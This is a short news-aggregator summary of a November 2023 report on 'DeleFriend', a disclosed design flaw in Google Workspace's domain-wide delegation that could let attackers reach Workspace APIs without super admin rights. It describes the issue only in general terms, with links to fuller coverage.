Google Workspace's Design Flaw Exposes Organizations to Unauthorized Access

November 28, 2023 at 12:34 PM

•

1 min read

Google Workspace's Design Flaw Exposes Organizations to Unauthorized Access — Photo: The Hacker News

TL;DR Summary

Cybersecurity researchers have discovered a "severe design flaw" in Google Workspace's domain-wide delegation feature that could be exploited by attackers to gain unauthorized access to Workspace APIs without super admin privileges. The flaw, codenamed DeleFriend, allows threat actors to manipulate existing delegations in the Google Cloud Platform and Google Workspace. By creating numerous JSON web tokens, attackers can pinpoint successful combinations of private key pairs and authorized OAuth scopes, enabling them to perform API calls on behalf of other identities in the domain. Successful exploitation of the flaw could result in the theft of emails, data exfiltration, and unauthorized actions within Google Workspace APIs.

Topics:technology #cybersecurity #data-security-data-breach #design-flaw #domain-wide-delegation #google-workspace #unauthorized-access

Share this article

Design Flaw in Google Workspace Could Let Attackers Gain Unauthorized Access The Hacker News
Design flaw leaves Google Workspace vulnerable for takeover Help Net Security
Researchers Claim Design Flaw in Google Workspace Puts Organizations at Risk DARKReading
Design Flaw in Domain-Wide Delegation Could Leave Google Workspace Vulnerable for Takeover, Says Cybersecurity Company Hunters Analytics Insight
View Full Coverage on Google News

Reading Insights

Total Reads

Unique Readers

Time Saved

1 min

vs 2 min read

Condensed

73%

384 → 104 words

Want the full story? Read the original article

Read on The Hacker News

JavaScript Required

tl;dr daily news requires JavaScript to be enabled. Please enable JavaScript in your browser settings.

Related Sources

Reading Insights